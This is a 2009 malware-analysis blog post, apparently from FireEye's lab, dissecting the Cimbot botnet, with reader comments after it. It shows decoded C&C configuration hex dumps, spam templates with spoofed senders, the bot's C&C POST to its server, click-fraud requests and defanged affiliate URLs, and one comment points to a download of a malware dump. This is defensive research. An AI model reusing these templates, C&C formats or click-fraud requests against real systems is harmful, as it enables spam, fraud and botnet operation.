00000500  77 2e 63 6f 6d 09 00 1b  00 00 00 19 00 52 65 66  |w.com........Ref|
00000510  65 72 65 72 3a 20 68 74  74 70 3a 2f 2f 64 65 76  |erer: http://dev|
00000520  61 77 2e 63 6f 6d 09 00  1b 00 00 00 19 00 52 65  |aw.com........Re|
00000530  66 65 72 65 72 3a 20 68  74 74 70 3a 2f 2f 6c 65  |ferer: http://le|
00000540  6e 75 77 2e 63 6f 6d 09  00 1b 00 00 00 19 00 52  |nuw.com........R|
00000550  65 66 65 72 65 72 3a 20  68 74 74 70 3a 2f 2f 6c  |eferer: http://l|
00000560  65 6e 75 77 2e 63 6f 6d  09 00 02 00 00 00 00 00  |enuw.com........|
00000570  09 00 02 00 00 00 00 00  09 00 02 00 00 00 00 00  |................|
*
00000860  0a 00 04 00 00 00 80 1a  06 00 0b 00 01 00 00 00  |................|
00000870  01 0c 00 01 00 00 00 01  0c 01 01 00 00 00 01 0c  |................|
00000880  02 01 00 00 00 02 0c 03  01 00 00 00 04 0c 04 01  |................|
00000890  00 00 00 03 0c 05 01 00  00 00 05 0c 06 01 00 00  |................|
000008a0  00 05 0c 07 01 00 00 00  05 0c 08 01 00 00 00 05  |................|
000008b0  0c 09 01 00 00 00 05 0d  00 01 00 00 00 01 0e 00  |................|
000008c0  04 00 00 00 50 c3 00 00  0f 00 01 00 00 00 01 11  |....P...........|
000008d0  00 28 00 00 00 26 00 2f  5e 28 5b 61 2d 7a 30 2d  |.(...&./^([a-z0-|
000008e0  39 5c 2d 5d 7b 31 2c 32  34 7d 29 5c 2e 28 5b 61  |9\-]{1,24})\.([a|
000008f0  2d 7a 5c 2e 5d 7b 32 2c  37 7d 29 24 2f 11 00 3c  |-z\.]{2,7})$/..<|
00000900  00 00 00 3a 00 2f 5e 28  5b 61 2d 7a 30 2d 39 5c  |...:./^([a-z0-9\|
00000910  2e 5d 7b 31 2c 33 30 7d  29 5c 2e 28 5b 61 2d 7a  |.]{1,30})\.([a-z|
00000920  30 2d 39 5c 2d 5d 7b 31  2c 32 34 7d 29 5c 2e 28  |0-9\-]{1,24})\.(|
00000930  5b 61 2d 7a 5c 2e 5d 7b  32 2c 37 7d 29 24 2f 12  |[a-z\.]{2,7})$/.|
00000940  00 47 00 00 00 45 00 2f  28 61 62 75 73 65 29 7c  |.G...E./(abuse)||
00000950  28 61 64 6d 69 6e 29 7c  28 77 65 62 6d 61 73 74  |(admin)|(webmast|
00000960  65 72 29 7c 28 70 6f 73  74 6d 61 73 74 65 72 29  |er)|(postmaster)|
00000970  7c 28 68 65 6c 70 29 7c  28 68 6f 73 74 6d 61 73  ||(help)|(hostmas|
00000980  74 65 72 29 7c 28 73 70  61 6d 29 2f 13 00 04 00  |ter)|(spam)/....|
00000990  00 00 88 13 01 00 21 00  01 00 00 00 01 21 01 01  |......!......!..|
000009a0  00 00 00 01 21 02 01 00  00 00 02 21 03 01 00 00  |....!......!....|
000009b0  00 1e 21 04 01 00 00 00  06 21 05 01 00 00 00 07  |..!......!......|
000009c0  21 06 01 00 00 00 08 21  07 01 00 00 00 09 21 08  |!......!......!.|
000009d0  01 00 00 00 0a 21 09 01  00 00 00 0f 22 00 05 00  |.....!......"...|
000009e0  00 00 04 25 4d 46 25 23  00 01 00 00 00 01 24 00  |...%MF%#......$.|
000009f0  05 00 00 00 04 25 48 4e  25 25 00 02 00 00 00 64  |.....%HN%%.....d|
00000a00  00 26 00 04 00 00 00 30  75 00 00 27 00 08 00 00  |.&.....0u..'....|
00000a10  00 e0 93 04 00 a0 bb 0d  00 0f 22 00 00 00 1c 00  |..........".....|
00000a20  25 52 41 4e 44 5f 4c 5f  34 5f 38 25 2e 66 61 6b  |%RAND_L_4_8%.fak|
00000a30  65 65 78 61 6d 70 6c 65  2e 63 6f 6d 0a 0b 0c 0d  |eexample.com....|
00000a40  0a 01 00 00 00 03 20 06  00 00 00 5b d4 41 5e bb  |...... ....[.A^.|
00000a50  01                                                |.|
00000a51

I'm not completely certain yet, but I think this is either performing Referer spamming, or crawling the web collecting email addresses, or both. The regular expressions are for filtering out certain file types, and email boxes while it harvests. I'm guessing it picks the User-Agents at random or in sequence or something. I can find out if anyone cares.

Googling for lenuw.com and devaw.com is left as an exercise for the reader.

I've replaced the source IP address for my lab machine with 10.11.12.13 (0x0a, 0x0b, 0x0c, 0x0d), and the reverse DNS name with fakeexample.com. (It's right at the very end of the hexdump.) This is of course used by the bot to determine it's own IP address when it's behind a NAT.

The %WHATEVERS% are the mail-merge template variables, that get filled in by appropriate values while sending spam. From examination of the Cimbot binary itself, these are all of the possible variables:

aRand_di_       db '%RAND_DI_',0        ; DATA XREF: sub_4070BB:loc_407E27↑o
aRand_lu_       db '%RAND_LU_',0        ; DATA XREF: sub_4070BB:loc_407CE0↑o
aRand_ldu_      db '%RAND_LDU_',0       ; DATA XREF: sub_4070BB:loc_407B99↑o
aRand_ld_       db '%RAND_LD_',0        ; DATA XREF: sub_4070BB:loc_407A52↑o
aRand_d_        db '%RAND_D_',0         ; DATA XREF: sub_4070BB:loc_40790B↑o
aRand_l_        db '%RAND_L_',0         ; DATA XREF: sub_4070BB:loc_4077C6↑o
aRand_char_ldu  db '%RAND_CHAR_LDU%',0  ; DATA XREF: sub_4070BB:loc_407603↑o
aRand_char_lu   db '%RAND_CHAR_LU%',0   ; DATA XREF: sub_4070BB:loc_4075A1↑o
aRand_char_ld   db '%RAND_CHAR_LD%',0   ; DATA XREF: sub_4070BB:loc_40753F↑o
aRand_char_u    db '%RAND_CHAR_U%',0    ; DATA XREF: sub_4070BB:loc_4074DD↑o
aRand_char_d    db '%RAND_CHAR_D%',0    ; DATA XREF: sub_4070BB:loc_40747B↑o
aRand_char_l    db '%RAND_CHAR_L%',0    ; DATA XREF: sub_4070BB:loc_40741B↑o
aRand_num       db '%RAND_NUM%',0       ; DATA XREF: sub_4070BB:loc_4073A3↑o
aRand_guid      db '%RAND_GUID%',0      ; DATA XREF: sub_4070BB:loc_407317↑o
aUnix_time      db '%UNIX_TIME%',0      ; DATA XREF: sub_4070BB+33↑o
aOe             db '%OE%',0             ; DATA XREF: sub_4090B6+8D2↑o
aDm             db '%DM%',0             ; DATA XREF: sub_4090B6+81E↑o
aHs             db '%HS%',0             ; DATA XREF: sub_4090B6+7EB↑o
aRc             db '%RC%',0             ; DATA XREF: sub_4090B6+7DC↑o
aMf             db '%MF%',0             ; DATA XREF: sub_4090B6+7CD↑o
aBi             db '%BI%',0             ; DATA XREF: sub_4090B6+2CD↑o
aMp             db '%MP%',0             ; DATA XREF: sub_4090B6+2BE↑o
aMh             db '%MH%',0             ; DATA XREF: sub_4090B6+2AF↑o
aHn             db '%HN%',0             ; DATA XREF: sub_4090B6+274↑o
aIp             db '%IP%',0             ; DATA XREF: sub_4090B6+223↑o

Second Example

These are some of the the decoded spam templates from the original .pcap I recieved.

One of the strings is like this:


Date: %UNIX_TIME% +0000
From: "Roeber Grossmann" <%MF%>
X-Mailer: The Bat! (3.62.11) Professional
Reply-To: Roeber Grossmann <%MF%>
X-Priority: 3 (Normal)
Message-ID: <1739770208.20090227075335@baberuth.com>
To: <%RC%>
Subject: More orgasmms
MIME-Version: 1.0
Content-Type: multipart/alternative;
 boundary="----------5BA0A36C8AFBFE"

------------5BA0A36C8AFBFE
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable


   New  Orgasm Enhancer
=09  =20


=09
Decades. There are schools in which the averages a troop
of monkeys ran chattering away and parrots of a better amusement
i sat on the roof to watch i was for some time his private
secretary, and at home in the evenings, he said. If not,
my servant.  
------------5BA0A36C8AFBFE
Content-Type: text/html; charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">=20
   <html>
<head>
<title>   </title>  =20
<META http-equiv=3DContent-Type content=3D"text/html; charset=3D"iso-8859-1=
">=20
</head>
<body> <strong>
</strong><br><span name=3D"#wqqq"></span>New  Orgasm Enhancer<br><br>Click=
=20
<a href=3D"http://cid-afbafcf33f10f80d.spaces.live.com/blog/cns!AFBAFCF33F1=
0F80D!107.entry">HERE</a><br><strong></strong><p><br></p><br>
<p><a name=3D"#qwww">
</a>Decades. There are schools in which the averages a troop<br> of monkeys=
 ran chattering away and parrots of a better amusement<br> i sat on the roo=
f to watch i was for some time his private<br> secretary, and at home in th=
e evenings, he said. If not,<br> my servant.</p></body></html>
------------5BA0A36C8AFBFE--

And another string is like this, I think it's the %MF% Mail From line:

domesticity@baberuth.com

Here's another, almost identical one:

The %MF% in this case is orthodontic@psnelling.co.uk. The server has already done the work of generating an appropriate Message-ID (half of it is the current datetime). (And of filling in most of the message with Markov-chain generated Bayesian filter poisoning text.)

From: "Valladores Malys" <%MF%>
X-Mailer: The Bat! (3.5.29) Professional
Reply-To: Valladores Malys <%MF%>
X-Priority: 3 (Normal)
Message-ID: <6465125974.20090227075649@psnelling.co.uk>
To: <%RC%>
Subject: More oorgasms
MIME-Version: 1.0
Content-Type: multipart/alternative;
 boundary="----------BF59A1A8555AD2"

------------BF59A1A8555AD2
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable


New Orgasm Enhanceer
 =09



Moment in the cafe with maria, paredes, and the of sutasoma
as also all his quivers. Bowless, i wish to the devil i
had shared your room with they glowed on shirt bosoms and
morning as well it in the name of the sovereignty of massachusetts,.   
------------BF59A1A8555AD2
Content-Type: text/html; charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">  =20
  <html>
<head>   <title>  </title> =20
<META http-equiv=3DContent-Type content=3D"text/html; charset=3D"iso-8859-1=
">  =20
</head> =20
<body>   <strong> </strong><br><br>New Orgasm Enhanceer<br><b>  </b>Click=
=20
<a href=3D"http://cid-a66afb2a221a9923.spaces.live.com/blog/cns!A66AFB2A221=
A9923!106.entry">HERE</a><br><span>=09</span><p><br></p><b>=09</b>
<p><b>   </b>Moment in the cafe with maria, paredes, and the of sutasoma<br=
>
as also all his quivers. Bowless, i wish to the devil i<br>
had shared your room with they glowed on shirt bosoms and<br>
morning as well it in the name of the sovereignty of massachusetts,.</p></b=
ody></html>
------------BF59A1A8555AD2--

There's one of these every 182 seconds (3 minutes). All of the From lines are spoofed:

Message IDMAIL FROM String
Message-ID: <6001459618.20090227085953@influencemag.ca>checking@influencemag.ca
Message-ID: <9730083908.20090227090253@schindelar.cz>cerro@schindelar.cz
Message-ID: <1455429741.20090227170249@danatec.com>inosculate@danatec.com
Message-ID: <9435482259.20090227170557@4lifetech.com>jealousy@4lifetech.com
Message-ID: <3624447656.20090227170909@math.usc.edu>misroute@math.usc.edu
Message-ID: <5001423059.20090227171217@oelhauser.ch>sorters@oelhauser.ch
Message-ID: <5576779480.20090227171533@mulemusic.no>enflames@mulemusic.no
Message-ID: <4990128715.20090227171833@isphording.de>triumph@isphording.de
Message-ID: <8370838722.20090227172137@heltreidar.com>mineworker@heltreidar.com
Message-ID: <4380821286.20090227172445@ton-fabrik.de>sneezeweed@ton-fabrik.de
Message-ID: <1429782066.20090227172801@rhpresence.fr>machinizes@rhpresence.fr
Message-ID: <4640089897.20090227173105@backfire.co.uk>shoed@backfire.co.uk
Message-ID: <5239254299.20090227173413@tsv-hochdahl.de>sinistral@tsv-hochdahl.de
Message-ID: <2726249263.20090227173721@applewise.co.jp>animally@applewise.co.jp
Message-ID: <8024786915.20090227174337@leak-pro.com>precatory@leak-pro.com
Message-ID: <2495183162.20090227174642@lyprodan.com>racemises@lyprodan.com
Message-ID: <2410127594.20090227174946@7acres.com.au>colonist@7acres.com.au
Message-ID: <1101937854.20090227175306@encore21.net>excreter@encore21.net
Message-ID: <7294082901.20090227182630@gyep.com>jumbling@gyep.com
Message-ID: <4650255037.20090227182934@am-auto.cz>downwardness@am-auto.cz
Message-ID: <3289686325.20090227183238@kleine-wege.de>ostensory@kleine-wege.de

Other Stuff

I should also note that the bot reports its status back up to the C&C server via a HTTP POST of a GIF, but I don't have anything else really interesting to say about this (it's the same key as above, most of this example is NULLs):

POST /account/p.php HTTP/1.1
Host: sufujilisi.info
Accept: */*
Content-Length: 97
Connection: close
Cookie: PHPSESSID=47d3066a386f5532af8a1d69c46c4896

00000000  47 49 46 38 39 61 f4 02  fe 01 21 bb ef b9 0f c8  |GIF89a....!.....|
00000010  40 4b 08 38 f1 1e 0f 8a  09 e9 83 55 79 2d 87 c6  |@K.8.......Uy-..|
00000020  3b 22 08 38 f1 1b 0f 8a  09 e9 a9 17 c1 e4 87 c6  |;".8............|
00000030  3b 22 08 38 f1 1b 0f 8a  09 e9 a3 17 c1 e4 8a e4  |;".8............|
00000040  3b 22 08 38 f1 1b 0f 8a  09 e9 a3 17 c1 e4 87 c6  |;".8............|
00000050  3b 22 08 38 f1 1b 0f 8a  09 0a                    |;".8......|
0000005a

Every fifty minutes, Cimbot will make HTTP requests to Affiliate click websites like this (there's no User-Agent):

GET /index.php?ref=24364 HTTP/1.1
Host: www.paid2link.com
Accept: */*
Connection: close

And this is the complete list of affiliate URLs, "s/http/hxxp/g"-ified mostly just to prevent anymore clicks on them by web-crawling machines.

hxxp://lecoquin.net/pages/index.php?refid=ec0lag
hxxp://www.paidclickings.com/default.asp?id=ec0lag
hxxp://www.dhcp-i386.biz/?ref=4912
hxxp://uniqwork.com/rjoin.asp?id=ec0lag
hxxp://www.ladyteapot.com/?refer=852
hxxp://www.dailypayouts.com/?ref=2130
hxxp://www.hotrusclick.com/signup.php?r=15293
hxxp://www.lionclix.com/index.php?ref=ec0lag
hxxp://www.megacashclicks.net/index.php?ref=ec0lag
hxxp://leapcash.com/signUp.php?ref=1945777
hxxp://www.birthdayclubptc.com/?r=ec0lag
hxxp://www.loo-promo.org/index.php?ref=381
hxxp://www.yep.com/Search2.aspx?keyword=exchange&agentID=321
hxxp://www.paid2link.com/index.php?ref=24364
hxxp://www.theadclick.com/pages/index.php?refid=ec0lag
hxxp://www.stormpay.com/?2523754
hxxp://www.joomcash.com/pages/index.php?refid=ec0lag
hxxp://www.onlineearningcenter.com/members/ec0lag
hxxp://www.carolina-clicks.com/pages/index.php?refid=ec0lag
hxxp://sb-money.com/monitor.php?kind=1&lang=0&user=352
hxxp://www.ruspromotion.net/site/index.php?ref=ec0lag
hxxp://www.kesefkal.net/ru/?refer=ec0lag
hxxp://getpaideventoday.com/index.php?i=1&ref=ec0lag
hxxp://www.clixnclix.net/index.php?ref=ec0lag
hxxp://www.TheGoldClick.Com/index.asp?ref=43256
hxxp://sunclicks.com/cgi-bin/reg.cgi?refid=ec0lag
hxxp://www.surfing4cash.info/index.php?ref=ec0lag
hxxp://www.trafficdinar.com/signup.php?r=5326
hxxp://www.egcash.com/index.php?refid=ec0lag
hxxp://leapcash.com/signUp.php?ref=ec0lag
hxxp://resource-a-day.net/member/index.cgi?tj42
hxxp://a.websponsors.com/c/s=16356/c=24323/
hxxp://www.alladvantage.com/go.asp?refid=ec0lag

Summary

Spamming, Email Harvesting, and Click Fraud about sums this up. None of this is really new, except for the fake GIF headers on the C&C communications.

Julia Wolf @ FireEye Malware Intelligence Lab
Questions/Comments to research [@] fireeye [.] com

FE Malware Researcher on 2009.03.16 in Botnet Research |

Technorati Tags: , , , , , , , , , , , , ,

TrackBack

TrackBack URL for this entry:
http://www.typepad.com/services/trackback/6a00d835018afd53ef011168fb2569970c

Listed below are links to weblogs that reference Cimbot - A technical analysis:

Comments

Feed You can follow this conversation by subscribing to the comment feed for this post.

Check out http://magnao.com/index.php?post=getting-rid-of-cimbot for more info on how to remove Cimbot.

Posted by: Murray Moffatt | 2009.05.10 at 06:10 PM

I have a new undetected version of this malware.
Instead of vazasaki-ji.info , it use atsiguchi.info, but still use referred at lenuw.com devaw.com regexp pattern abowe, and also point to http://sunclicks.com/cgi-bin/reg.cgi?refid=ec0lag

It loaded via service by WINDOWS\system32\svchost.exe -k DcomLaunch
I have dump of infected svchost.exe , and several crypted dll. Today NO ONE of the antivirus toolkit has detected it. It is bad.
But I can't locate main loader file or dll.

You can download dump at http://www [dot] djonline [dot] ru /drwebmail [dot] zip

Posted by: Denis | 2009.05.08 at 03:54 AM

Do you have any idea on how I can remove Cimbot?

I've searched everywhere but I can't find anything. It seems that Cimbot is below the radar of most anti-virus and anti-spyware programs.

Posted by: Murray Moffatt | 2009.05.03 at 10:47 PM

Both http://devaw.com and http://lenuw.com appeared as redirection urls on hijacked public Unix servers starting in Late January. There have been thousands of these since last October. They are the actual redirection target used in a rash of "Canadian Pharmacy" (ie: Spamit.biz) spam runs.

The binary you have reverse engineered appears to be somehow related to these Unix server hijacks.

To describe this more explicitly:

- Someone hijacks a unix server with some known exploit.
- The unix server is always running Apache
- The hijacker places an innocuous html file on the hijacked server whose sole purpose is to redirect to the target url used in a pharmacy spam run (ie: http://lenuw.com)
- The hijacked server's domain is used in a Canadian Pharmacy spam run, targeting several million recipients.

Attempts to get these files removed and the hijacked servers secured have met with zero response so far. These are typically abandoned servers.

Canadian Pharmacy as a spam property is supported by the Spamit.biz affiliate program (based in - of course - Russia) and has several ties to the Storm bot, as well as the Russian Business Network (RBN).

I blogged about them here, referring to the more public-facing affiliate program known as Glavmed:

http://ikillspammers.blogspot.com/2009/02/glavmed-open-letter-to-law-enforcement.html

Thought you should know.

SiL / IKS / concerned citizen.

Posted by: soamislame | 2009.03.16 at 05:11 PM

The comments to this entry are closed.